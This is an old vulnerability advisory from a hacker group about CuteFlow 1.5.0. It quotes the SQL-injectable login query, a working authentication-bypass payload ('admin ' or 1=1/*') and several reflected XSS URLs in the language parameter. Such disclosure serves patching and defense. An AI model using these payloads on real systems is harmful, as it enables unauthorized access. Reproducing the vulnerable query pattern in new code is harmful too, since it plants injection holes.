CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

2008-03-30T00:00:00
ID SECURITYVULNS:DOC:19533
Type securityvulns
Reporter Securityvulns
Modified 2008-03-30T00:00:00

Description

         ########################################################################
         #                                                                      #
         #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities           #
         #                      [sql injection & Xss]                                       #
         ########################################################################

Virangar Security Team

www.virangar.org www.virangar.net


Discoverd By : hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :)

sql vuln code in login.php:

$query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'";


the login forme included in index.php you must login in index.php ;) vuln: login:admin ' or 1=1/* password:whatever


and you can see xss vuln too here:

/page/showcirculation.php?language=<script>alert(1111)</script> /pages/edittemplate_step2.php?language=<script>alert(1111)</script> /pages/showfields.php?language=<script>alert(1111)</script>> /pages/showuser.php?language=<script>alert(1111)</script> /pages/editmailinglist_step1.php?language=<script>alert(222)</script> /pages/showtemplates.php?language=<script>alert(1111)</script>


tnx all h4ck3rz